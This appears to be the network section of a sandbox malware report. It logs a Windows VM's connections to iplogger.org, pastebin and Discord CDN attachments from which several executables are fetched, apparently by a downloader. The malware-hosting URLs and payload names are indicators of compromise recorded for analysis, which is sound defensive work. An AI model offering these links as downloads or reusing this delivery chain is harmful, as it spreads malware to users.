Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
edgedl.gvt1.com | 142.250.34.2 | |
pastebin.com | 104.23.99.190 | |
iplogger.org | 88.99.66.31 | |
whatitis.website | ||
gwenetha.info | 104.21.12.27 | |
cdn.discordapp.com | 162.159.130.233 |
- TCP Requests
-
-
192.168.56.102:49814 104.23.98.190:443pastebin.com
-
192.168.56.102:49816 142.250.34.2:80edgedl.gvt1.com
-
192.168.56.102:49815 142.250.66.131:443
-
192.168.56.102:49809 162.159.130.233:443cdn.discordapp.com
-
192.168.56.102:49812 162.159.130.233:443cdn.discordapp.com
-
192.168.56.102:49813 162.159.130.233:443cdn.discordapp.com
-
192.168.56.102:49818 162.159.130.233:443cdn.discordapp.com
-
192.168.56.102:49820 162.159.130.233:443cdn.discordapp.com
-
192.168.56.102:49821 162.159.130.233:443cdn.discordapp.com
-
192.168.56.102:49822 162.159.130.233:443cdn.discordapp.com
-
192.168.56.102:49797 172.217.25.14:443
-
192.168.56.102:49817 172.67.131.232:443gwenetha.info
-
192.168.56.102:49808 203.159.80.228:80
-
192.168.56.102:49824 216.58.220.195:443
-
192.168.56.102:49825 216.58.220.195:443
-
192.168.56.102:49805 88.99.66.31:443iplogger.org
-
192.168.56.102:49819 88.99.66.31:443iplogger.org
-
- UDP Requests
-
-
192.168.56.102:50538 164.124.101.2:53
-
192.168.56.102:50839 164.124.101.2:53
-
192.168.56.102:54221 164.124.101.2:53
-
192.168.56.102:54660 164.124.101.2:53
-
192.168.56.102:57660 164.124.101.2:53
-
192.168.56.102:61459 164.124.101.2:53
-
192.168.56.102:61998 164.124.101.2:53
-
192.168.56.102:62039 164.124.101.2:53
-
192.168.56.102:62461 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:56752 239.255.255.250:1900
-
192.168.56.102:56754 239.255.255.250:3702
-
192.168.56.102:56756 239.255.255.250:3702
-
192.168.56.102:61460 239.255.255.250:3702
-
GET
200
https://iplogger.org/1xPHh7
REQUEST
RESPONSE
BODY
GET /1xPHh7 HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Apr 2021 04:21:18 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=43jhm26i7cvvbmekc0t994tig1; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451713; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
301
https://iplogger.org/2CQAB5.exe
REQUEST
RESPONSE
BODY
GET /2CQAB5.exe HTTP/1.1
Host: iplogger.org
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Apr 2021 04:21:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ntrietnplolbn63cfi8er9spl1; path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451712; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: https://cdn.discordapp.com/attachments/826198252025675816/826537386485612574/china.png
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
https://cdn.discordapp.com/attachments/826198252025675816/826537386485612574/china.png
REQUEST
RESPONSE
BODY
GET /attachments/826198252025675816/826537386485612574/china.png HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:21:19 GMT
Content-Type: image/png
Content-Length: 7680
Connection: keep-alive
Set-Cookie: __cfduid=df321f498f10b91584304ea0d7694a6c31617596479; expires=Wed, 05-May-21 04:21:19 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63affd2ee92ea249-ICN
Accept-Ranges: bytes
Age: 451491
Cache-Control: public, max-age=31536000
ETag: "6be41709f8bfbf06307cc56d04249801"
Expires: Tue, 05 Apr 2022 04:21:19 GMT
Last-Modified: Tue, 30 Mar 2021 19:24:29 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941dc914e0000a249e5308000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1617132269285743
x-goog-hash: crc32c=aF03UA==
x-goog-hash: md5=a+QXCfi/vwYwfMVtBCSYAQ==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 7680
X-GUploader-UploadID: ABg5-UxiLDAZpR0Y2Z-4q6HmHSbdJu2Aw-itbIW-AA7MULcbcKMNQuhX9Jwm3JIVWTkUW9lL6Zi8VfeBlfDJSccdNIEhbl2dsA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=33FgSxMT2IFWZUZhoB%2BGfvr2%2BjN2bP4efX7%2F1rjkzHBJHPIgFoAlHnfB1MXqS7FE3ZC%2B2zp1n9291bSgPfajxOAfCJO6Rfb5tsbJRbigFHTp6JI%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
403
https://cdn.discordapp.com/attachments/822543417757270050/826145904716152872/PlayerUI.exe
REQUEST
RESPONSE
BODY
GET /attachments/822543417757270050/826145904716152872/PlayerUI.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:21:21 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=dc3c8df79e420aef37d62925d70899c9c1617596481; expires=Wed, 05-May-21 04:21:21 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63affd381f3fa249-ICN
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:21 GMT
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941dc97130000a249fe01c000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UyEcfuRjj12PlZUCc6KE9mMO6uetp0S0vSL8Hv8izJlj6yygUuPegLczrDr7bYTEeKW3givpJclAidA4t_50acdu_Dhew
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=kPTE86Ip9%2Fqqnby%2BB4uN9mkz9%2BnNkf4JrzXQW0QUuHLJYGIp9SJLC%2BZx3IibTQIR8FKoluoYGktnlyI4vgXfz59yr4bSEZGY8P1r94RTfIOdTl0%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
403
https://cdn.discordapp.com/attachments/822543417757270050/826145904716152872/PlayerUI.exe
REQUEST
RESPONSE
BODY
GET /attachments/822543417757270050/826145904716152872/PlayerUI.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:21:21 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d605fe05df2ecdf414f26d19a60dcc44f1617596481; expires=Wed, 05-May-21 04:21:21 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63affd382b130284-ICN
Age: 7171
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 02:21:50 GMT
Vary: Accept-Encoding
CF-Cache-Status: UPDATING
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941dc971c00000284fb9be000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UxM9mW_5v2OmOFnTtca1jtfaQztMhoN1oeSnXshGvUQXdEDs3QBo0qx4CYCaKa3chT0L5y__oICpZif_IlFJRuintX-lg
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LuvZMBMsA2lF78o%2Fk%2BqKDEHHfPAb2JLCqhaw8315P8p7y0qoocewURVylxU0N3TLjoBg2VSotnOMpilFHk7PkH9Mmj8nHWrJ0bIT6e%2FaBfbphMM%3D"}],"max_age":604800,"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
GET
403
https://cdn.discordapp.com/attachments/822543417757270050/826145904716152872/PlayerUI.exe
REQUEST
RESPONSE
BODY
GET /attachments/822543417757270050/826145904716152872/PlayerUI.exe HTTP/1.1
Referer: Microsoft Windows 7 Professional KN
User-Agent: test22@TEST22-PC
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:21:21 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d9b3432133bd538be67e0754393f9c73a1617596481; expires=Wed, 05-May-21 04:21:21 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63affd39aeec00d3-ICN
Age: 0
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:21 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941dc9805000000d331bb4000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UyEcfuRjj12PlZUCc6KE9mMO6uetp0S0vSL8Hv8izJlj6yygUuPegLczrDr7bYTEeKW3givpJclAidA4t_50acdu_Dhew
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=tRQpwoZvcsyC9ZNnf1NZgAZ7ViuGr9zdwCTMWKu9GBquOmBWFoUtfyNG2LOHjmIZ5WJq2tltUEDIEEpF9sYGDGSmxTC9vLbEankcF3JAVaMgGyc%3D"}]}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
POST
200
https://update.googleapis.com/service/update2?cup2key=10:2761306227&cup2hreq=71b51d9ea15a088b2af84ffd33921119eb65dcd4b9b4898e9e4276f19445345c
REQUEST
RESPONSE
BODY
POST /service/update2?cup2key=10:2761306227&cup2hreq=71b51d9ea15a088b2af84ffd33921119eb65dcd4b9b4898e9e4276f19445345c HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Google Update/1.3.36.32;winhttp;cup-ecdsa
X-Old-UID: cnt=0
X-Goog-Update-AppId: {430FD4D0-B729-4F61-AA34-91526481799D},{8A69D345-D564-463C-AFF1-A69D9E530F96}
X-Goog-Update-Updater: Omaha-1.3.36.32
X-Goog-Update-Interactivity: bg
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Content-Length: 1202
Host: update.googleapis.com
HTTP/1.1 200 OK
Content-Security-Policy: script-src 'report-sample' 'nonce-94amkTHoOMZd/xDWOmHFYw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Apr 2021 04:21:26 GMT
X-Cup-Server-Proof: 3046022100bed6a492ec0d3e8b0f5729b7df31af546628950edf766d3559eb3f6817a8f618022100ac033164216b0f31803fd97ed8d8569c92119705ff08b5b4b937df5f2e33deab:71b51d9ea15a088b2af84ffd33921119eb65dcd4b9b4898e9e4276f19445345c
Content-Type: text/xml; charset=UTF-8
X-Daynum: 5207
X-Daystart: 76886
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET
200
https://iplogger.org/1iPtu7
REQUEST
RESPONSE
BODY
GET /1iPtu7 HTTP/1.1
Host: iplogger.org
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Apr 2021 04:21:34 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=rtundue2ffdimmsir5ma1gkr95; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451697; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
https://pastebin.com/raw/gCyjHCCH
REQUEST
RESPONSE
BODY
GET /raw/gCyjHCCH HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:21:35 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=db2e1ac02aa562fecf2898246bdf21d0a1617596494; expires=Wed, 05-May-21 04:21:34 GMT; path=/; domain=.pastebin.com; HttpOnly; SameSite=Lax; Secure
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
cf-request-id: 0941dccb1100000284b50dd000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 63affd8b4c440284-ICN
GET
404
https://gwenetha.info/setup-KGQJ-1.exe
REQUEST
RESPONSE
BODY
GET /setup-KGQJ-1.exe HTTP/1.1
Host: gwenetha.info
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Date: Mon, 05 Apr 2021 04:21:54 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 19
Connection: keep-alive
Set-Cookie: __cfduid=d98100dc0ab336fb64ff161b55ce378ea1617596514; expires=Wed, 05-May-21 04:21:54 GMT; path=/; domain=.gwenetha.info; HttpOnly; SameSite=Lax
X-Content-Type-Options: nosniff
CF-Cache-Status: DYNAMIC
cf-request-id: 0941dd1903000042a505992000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=qYHryEbfgaYUGEGRg8sj9CFBSzikuMNvu5JZQA%2BTQm5yDlOUSzgogB%2FC6%2FoTNTuNMbbcPAlx31bcASu%2BESXZnT8U%2BIqkMcH09ZeB%2B%2B%2FM"}]}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 63affe0808d342a5-LAX
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET
403
https://cdn.discordapp.com/attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe
REQUEST
RESPONSE
BODY
GET /attachments/826198252025675816/826538114838298715/install_setupVPSfree.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:21:55 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d87e2ef5ef19e827792e71fcbe375f3cf1617596514; expires=Wed, 05-May-21 04:21:54 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63affe0a7c54fffc-ICN
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:55 GMT
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941dd1a890000fffc110dc000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-Uy0DBZJ4PhYaAXNgHdhHtQPXr-fMEjb214k4lBMCsgfAwX3FQoZ4J4-MeRNNmimijjA9VnigLiWft_v8_ovP2E
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FRfyt0n3tOb0mk2J8eCZ%2BWV%2BJzinVQ4UvTdlCThyCFfoPkgMNIwlB72Md0u%2FT8JxAP97AaENnEKDhMoTi75dDmYAqoMuDiCRVByCflAluvpbtB4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe
REQUEST
RESPONSE
BODY
GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:21:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d320e0145b20ed5d1a0a88c97cc1813d51617596515; expires=Wed, 05-May-21 04:21:55 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 0941dd1bcf000012dabb1c8000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UbFb0mITie5hYGkPtvh3nKYN8rnO1FvilBp6P5xixtEDzPn5dSduwLc6O%2BmM8qTxP2Qp4ZdbhEZD%2B9eqr%2FyaSa%2FRzFZAhD0Eo6C3AQxKKXGUQ1w%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 63affe0c78cc12da-ICN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET
403
https://cdn.discordapp.com/attachments/826416818390040589/826855866228670474/7525b875715555.exe
REQUEST
RESPONSE
BODY
GET /attachments/826416818390040589/826855866228670474/7525b875715555.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:21:55 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=d320e0145b20ed5d1a0a88c97cc1813d51617596515; expires=Wed, 05-May-21 04:21:55 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63affe0dec9912da-ICN
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:21:55 GMT
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941dd1cb2000012da0339f000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-UyFfb0ju1UrZ8d3NVFfJE2mzlIJ6zA-jrpBc5Sed9FaHeB6-X5SNWuiJVWee-3nAVZmMLnfGcMql2KTa7C362jNEp-T7Q
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=HK638qjqB99kW%2BHTxiZpy8yk%2F9GU%2BxaspigLQWY%2Bbt8gXKepZruRZ3%2Fkr5zHlFx7pYRb2QZsrgRbq%2FjMn9T7F5Zluar0DNxutekfiqVkfyfFeM0%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
301
https://iplogger.org/2LehR6.exe
REQUEST
RESPONSE
BODY
GET /2LehR6.exe HTTP/1.1
Host: iplogger.org
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 05 Apr 2021 04:21:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=j6tlsqgbaajed1u0bngnctd8k6; path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451674; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET
200
https://cdn.discordapp.com/attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe
REQUEST
RESPONSE
BODY
GET /attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:22:22 GMT
Content-Type: application/x-msdos-program
Content-Length: 505856
Connection: keep-alive
Set-Cookie: __cfduid=d4cd09ae93be6016b15fa13e074f315eb1617596542; expires=Wed, 05-May-21 04:22:22 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63affeb8cc98a273-ICN
Accept-Ranges: bytes
Age: 451551
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe
ETag: "28345a7bb63babaf99e760965ce493b7"
Expires: Tue, 05 Apr 2022 04:22:22 GMT
Last-Modified: Tue, 30 Mar 2021 19:35:01 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941dd87810000a27380943000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1617132901889175
x-goog-hash: crc32c=Ws/4nQ==
x-goog-hash: md5=KDRae7Y7q6+Z52CWXOSTtw==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 505856
X-GUploader-UploadID: ABg5-UznZNO55X93AubXlWYP0c5SyYOTRHkzDJhcIzrcH58RoyWaPDs0j0jqBmhsS-QvB5VHDoqPplp1xtV5hwkr0kW8h3tVvw
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=yVAcKIctmJ60MyU6AzKNqQe%2BJjYSr1rvrQ5Y2JS343sR5hHoXHWgLryOzMVPPAFJ67JHNoJjQbY6BAdqKzq46ISEFhfqWDqyBpl3QmIXpFY3cZg%3D"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
GET
403
https://cdn.discordapp.com/attachments/826416818390040589/826469949593485312/file.exe
REQUEST
RESPONSE
BODY
GET /attachments/826416818390040589/826469949593485312/file.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 403 Forbidden
Date: Mon, 05 Apr 2021 04:22:27 GMT
Content-Type: application/xml; charset=UTF-8
Content-Length: 223
Connection: keep-alive
Set-Cookie: __cfduid=de8b89d5a96e34cc6f6bf3bc90aa7c9f41617596546; expires=Wed, 05-May-21 04:22:26 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
CF-Ray: 63affed25f64a1dd-ICN
Cache-Control: private, max-age=0
Expires: Mon, 05 Apr 2021 04:22:27 GMT
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
cf-request-id: 0941dd97750000a1dd488eb000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ABg5-Uz26yCKX_mnm6Nq82REhI6Fx_B21T6sSzasO3o7WjHseapUVbZdAIUTBzRlptQQvF8aBJBvqa2sWRPCuaJyXZft1yNPFg
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=6s1K0OyvzKz6qjb9YED7rEn6MZVTgMUu3Nt%2B2W6lD6a7mXiqWD8oq%2BzBw9RMmhnNO9wj7cAedB8PBtZ9m0pjEjmhrv63GaRBu1t1Jw8oxRCOxKg%3D"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
GET
200
https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe
REQUEST
RESPONSE
BODY
GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1
Host: cdn.discordapp.com
HTTP/1.1 200 OK
Date: Mon, 05 Apr 2021 04:22:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dbdb52ef6254f6582d01f67c601d9c2921617596546; expires=Wed, 05-May-21 04:22:26 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
cf-request-id: 0941dd979c0000a273733c6000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zvstFQiumAZrLs9lRPZdwtyFJ%2BRSjC86J9FImex0GZa7Rc9xfBhaHtklhgGSsvIoH0d0IDCtyHKf2WWa2x7Klp7S4yboe4aWNyzKWrD%2Fs7Z1NkY%3D"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 63affed29943a273-ICN
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
POST
200
https://update.googleapis.com/service/update2
REQUEST
RESPONSE
BODY
POST /service/update2 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Google Update/1.3.36.32;winhttp
X-Old-UID: cnt=0
X-Goog-Update-Updater: Omaha-1.3.36.32
X-Goog-Update-Interactivity: bg
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Content-Length: 1598
Host: update.googleapis.com
HTTP/1.1 200 OK
Content-Security-Policy: script-src 'report-sample' 'nonce-M7tlWubnM0ZS7qNNujCMKQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Apr 2021 04:22:39 GMT
Content-Type: text/xml; charset=UTF-8
X-Daynum: 5207
